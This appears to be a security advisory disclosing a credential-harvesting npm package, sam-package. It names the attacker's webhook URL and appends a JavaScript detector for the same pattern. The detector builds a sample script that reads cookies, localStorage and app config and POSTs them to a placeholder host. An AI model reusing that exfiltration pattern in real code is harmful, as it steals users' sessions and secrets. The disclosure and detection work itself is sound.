
MAL-2026-5807

Malicious code in sam-package (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (2f72005fa8e33092f24cc01717ead3f6a39a83ec9df95a276076ca263c522347)

On require()/bundle load, index.js collects userAgent, location, document.cookie, localStorage, sessionStorage, referrer, and the runtime globals window.__TINES_CONFIG__ and window.__APP_CONFIG__, then POSTs the payload to https://webhooksite.net/206fe563-3cfb-42fc-b589-b8b748b4c640 with mode:'no-cors' (index.js line 13). The README advertises only a trivial greet() helper; the exported greet is a stub (`get: () => {}`) that does not match the documented API. The targeted probing of window.__TINES_CONFIG__ (the Tines SOAR runtime config), combined with cookie/localStorage theft and a hardcoded webhook sink, marks this as a session/credential harvester aimed at users who load the package in a browser bundle, particularly Tines automation environments. package.json also declares `"postinstall": "node postinstall.js"`, but postinstall.js is absent from the tarball: installation fails today, but the hook is scaffolding for a future install-time payload.
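The two indicators described above (a lifecycle hook whose script is missing from the tarball, and browser-secret reads paired with a fetch to a hardcoded external sink) can be checked mechanically. The following is an added illustration, not code from the advisory or from sam-package; the package contents are constructed in memory and the sink URL is a placeholder.

```javascript
// Added example (not part of the advisory or of sam-package). The package.json,
// file list and index.js below are constructed samples with a placeholder sink.
// Browser-side reads that a plain utility library has no business making.
const BROWSER_SECRET_READS = [
  /document\.cookie/,
  /\blocalStorage\b/,
  /\bsessionStorage\b/,
  /window\.__[A-Z_]+CONFIG__/,
];

// Check 1: lifecycle hooks of the form "node <file>" whose target file is
// absent from the tarball (the advisory notes postinstall.js is missing).
function missingLifecycleTargets(pkgJson, fileList) {
  const scripts = pkgJson.scripts || {};
  const findings = [];
  for (const hook of ['preinstall', 'install', 'postinstall']) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    const m = cmd.match(/^node\s+(\S+)/);
    if (m && !fileList.includes(m[1])) {
      findings.push({ hook, cmd, missingFile: m[1] });
    }
  }
  return findings;
}

// Check 2: source that reads several browser secrets and POSTs to a hardcoded
// absolute URL; mode:'no-cors' means the sender never needs the response.
function exfilIndicators(source) {
  const reads = BROWSER_SECRET_READS.filter((re) => re.test(source)).length;
  const hardcodedSink = /fetch\(\s*['"]https?:\/\/[^'"]+['"]/.test(source);
  const noCors = /mode\s*:\s*['"]no-cors['"]/.test(source);
  return { reads, hardcodedSink, noCors, suspicious: reads >= 2 && hardcodedSink };
}

// Constructed sample mirroring the described layout (placeholder sink URL).
const SAMPLE_PKG_JSON = { name: 'sample-pkg', scripts: { postinstall: 'node postinstall.js' } };
const SAMPLE_FILES = ['package.json', 'index.js', 'README.md'];
const SAMPLE_INDEX_JS = [
  "const data = { ua: navigator.userAgent, c: document.cookie,",
  "  ls: JSON.stringify(localStorage), cfg: window.__TINES_CONFIG__ };",
  "fetch('https://sink.example.invalid/hook', { method: 'POST', mode: 'no-cors', body: JSON.stringify(data) });",
].join('\n');

function auditSample() {
  return {
    hooks: missingLifecycleTargets(SAMPLE_PKG_JSON, SAMPLE_FILES),
    exfil: exfilIndicators(SAMPLE_INDEX_JS),
  };
}
```

Running `auditSample()` on the sample reports the dangling postinstall target and three browser-secret reads alongside a hardcoded no-cors sink; on a clean package both findings are empty.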

Is this version affected?

Enter the package version you are using and it will be evaluated immediately.

Affected packages

npm / sam-package

No fixed version published yet for sam-package (npm). Pin to a known-safe version or switch to an alternative.

References